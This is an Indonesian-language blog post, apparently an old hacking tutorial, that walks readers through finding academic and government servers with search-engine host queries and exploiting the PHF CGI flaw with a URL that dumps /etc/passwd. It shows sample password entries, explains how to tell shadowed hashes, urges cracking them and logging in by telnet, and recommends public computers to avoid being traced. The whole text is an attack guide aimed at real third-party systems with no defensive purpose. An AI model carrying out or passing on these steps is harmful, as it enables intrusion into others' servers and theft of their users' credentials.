1. Jalankan browser dari komputer umum. Terserah kamu, entah komputer milik kampus, perpustakaan, warnet atau... apalah... dan bukalah Altavista. Ya, kita akan mencari target melalui Altavista. Berikut ialah target-target yang lumayan empuk:
- ac.jp (jepang, situs akademis)
- ac.kr (korea)
- ac.uk (inggris)
- ac.ir (iran)
- go.kr (pemerintahan korea)
- com.il (israel, situs komersil)
Pada kolom Search the web for, isilah dengan kata kunci:
host:ac.ir
Lalu search...
Buka halaman baru browser kamu kemudian ketikkan:
http://nama.target.kamu/cgi-bin/phf?Qalias=x/bin/cat%20/etc/passwd
Nah, lihat apa yang terjadi. Jika muncul pesan error, kembali ke Altavista untuk mencari target lain. Khan masih banyak target yang belum dicoba ;) Kemungkinan lain.. Kamu BERHASIL!!! tapi jangan senyum-senyum dulu, ingat!! seluruh info tentang kamu tercatat di server target. Hehehe.. tapi ga usah panik laah.. khan pakai komputer umum ;)
Nah, akan muncul tulisan kurang lebih demikian:
root:*:0:0:System Administrator:/:/bin/csh
sysadm:*:1:1: SPYRO KiD:/usr/adm:/bin/bash dll dll.
Lho, udah berhasil yach, trus ngapain?? SABAR DULU!! kamu memang telah sukses ngedapetin file passwordnya, tapi file tersebut telah di shadow. (Baca Artikel tentang SHADOW PASSWORD di halaman Artikel&Trik www.spyrozone.net) Darimana?? kok tau kalo di shadow?? Itu tuch, setelah tanda titik dua yang pertama khan ada bintangnya.
Nah, jika yang muncul bukan seperti diatas, melainkan seperti ini:
Nah, jika yang muncul bukan seperti diatas, melainkan seperti ini:
root:OUk9b8RqMRVNs:0:0:root,,,,,,,:/:/bin/csh
sysadm:*:0:0:System V Administration:/usr/admin:/bin/sh
diag:*:0:996:Hardware Diagnostics:/usr/diags:/bin/csh
spyro:F5AymuqmXVFCU:1399:8:spyro kid:/usr/spyro:/bin/tcsh dll dll.
Baru dech kamu bisa senyum-senyum... ;) Simpan file password tersebut dan Crack dengan menggunakan software Password Cracker di halaman member ;) Setelah itu... gunakan dech account itu untuk mengakses mesin Unix mu yang 'baru' hehehe... selamat ber-telnet ria... ;)
/* ------------------------------|EOF|------------------------------ */
No comments:
Post a Comment